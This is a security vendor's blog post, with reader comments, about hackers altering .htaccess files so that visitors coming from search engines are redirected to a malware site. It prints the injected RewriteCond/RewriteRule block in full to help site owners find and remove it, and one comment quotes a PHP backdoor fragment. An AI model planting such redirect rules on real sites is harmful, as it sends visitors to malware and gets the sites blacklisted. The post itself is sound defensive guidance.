• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Conditional redirects (or the htaccess malware)

April 13, 2010David Dede

FacebookTwitterSubscribe

We see all types of malware daily, but one of them seems to cause a lot of confusion to our users (and everyone in general). This is the common question we hear:

“Some users are complaining that when they search for my site on Google, they are redirected to a site full of malware/virus/spam, but when I access, it looks fine. I even scanned it with multiple anti-virus and they didn’t detect anything”

What that means is that someone hacked your site and modified your .htaccess file to redirect users coming from Google to a malware-infested site. Because of that, you end up blacklisted and losing users that can’t reach your site. (well, at least 99% of the time this is the cause).

That’s how the modified .htaccess file looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* https://badsite.com [R,L]

On some we even see these conditional redirects if the users are coming from Twitter, myspace, Linkedin, etc:

..
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .blog. [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
..

The reason most desktop anti virus (or malware scanners) won’t detect that when you scan your files is because they don’t understand the .htaccess file and they won’t follow this redirection. On Sucuri that’s how we would alert:
How to fix it?

Fixing this redirection is very simple, you just need to delete these entries from your .htaccess file (you can have more than one, so check all your directories) and you are set. However, you still have to verify that you don’t have anything else hidden in there, so do a full scan of your web site to make sure you are clean.

In addition to that, you still need to fix the problem that allowed you to get hacked. Most of the time it means updating your web application (WordPress, Joomla, etc), changing your passwords and cleaning your desktop.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit https://sucuri.net or just send us an email at contact@sucuri.net.

FacebookTwitterSubscribe

Categories: Website SecurityTags: Conditional Malware, Hacked Websites, Redirects, SEO Spam, Server Security

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Rafael Torrales

    October 17, 2010

    very helpfull, thanks

  2. Brent Lagerman

    April 4, 2011

    I really love you guys, thanks for fixing up our sites, you provide an amazing service — I’m really happy to have found someone we can trust to remove malware!

    brent
    @
    mimoYmima.com

  3. Jon

    June 11, 2011

    Thank you so much !
    I was really stressed out and frustrated from getting nowhere with my malware infected site.
    Your scanner helped me fix up my site !

    Much appreciated

  4. Tim Jeter

    September 22, 2011

    this is good information, however my site(s) are infected in this very manner, but cleaning them does not solve the problem. When I download the .htaccess file, clean it, and upload it again, it immediately becomes infected. I download it again and ‘bam,’ infected.

    So apparently in my case there is other malicious code that can not only detect when the .htaccess is modified, but actively revert it back to its infected state.

    Any ideas?

    • Josh

      October 5, 2011

      I am also having this issue. When I modify or even remove the htaccess file(s), they reappear moments later with the offending code. Any advice?

      • Erika

        October 17, 2011

        this also happened to me. I’ve removed almost everything I had up on the site. I have a subdomain with no .htacces and no index.php and I’m now seeing this redirect there.

      • rectorgroup LT

        February 7, 2012

         Firstly download all infected ftp to your computer, with nodepad++ find all files with this “<?php @error_reporting(0); if". thn delete them, after you will done it, delete malware from .htacces. Delete all your old ftp, and upload fixed ftp. Done 🙂

  5. Guestas

    February 3, 2012

    I had the same problem, very confusing I’d say. Thanks for info!

  6. joell lapitan

    February 14, 2012

    it is not on htaccess

  7. joell lapitan

    February 14, 2012

    it is in the htaccess.. sorry

  8. Roelf

    May 8, 2012

    thank you so much, can I change the atributes of the .htaccess file to 444 or is it not advisable?
    I have changed it to 444 and it seem to work.

  9. webbinit

    August 28, 2012

    I have the same issue as below. Remove the infected htaccess file and upload new fresh one and straight away it’s infected again. Not sure what to do???

    • sushant

      September 9, 2012

      i have the same problem there is a file.htaccess if i delete it it get back if few seconds and this is spread in my whole hosting account means every directroy

      • Joe

        October 6, 2012

        Yup same here. A bunch of .htaccess files are being created under every folder and when they get deleted, after a bit seem to recreated. I would love to know how that script or malicious file got in my website directory and how to get rid of it! ugh, basically took down all my websites. Anyone with ideas, please chime in!

        • Sushant Garg

          October 6, 2012

          ok, when i got this problem i find a backdoor in my website.
          please try to find it i found joomla 1.5 back door in images folder

        • dante_hwd

          October 8, 2012

          Hi,
          I just cleaned out the third site with this issue.
          What is happening is that a file/page was injected into your site. This page gets called from the outside every x minutes (in my last case it was 15 minutes) and it will overwrite any .htaccess it can find.
          The only way out of this is to find the page first, remove it and then get rid of the affected .htaccess. Of course the challenge then is to identify how the page got in.
          Good luck

  10. CERO

    October 30, 2012

    I had another variant of this thing infecting my site.. The culprit was IP

    37.59.62.209 accessing the IMAGES FOLDER.. check for weird PHP files here.. in my case.. there were 2 PHP files.. one in the STORIES directory… that had a codified code similar as the shown in this page (I suppose to download the latest malware) and the other in /images/banners/.cache_s75tfl.php Note that the behavior is VERY SIMILAR.. i found this file due of it constantly creating the .log file.. I am still not sure if I cleaned my server completely.

  11. Brian Ducharme

    November 4, 2012

    I had this problem infect my server from a Joomla website that was not up-to-date. I cleaned it from all the websites except for 1 which I can not find the issue. It is just a plain HTML website, no PHP files, no .htaccess file, no javascript, but when I run it through the scans it comes back as redirecting to malware sites. Any ideas? I’m at a loss. The site is cookeassociates.net.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.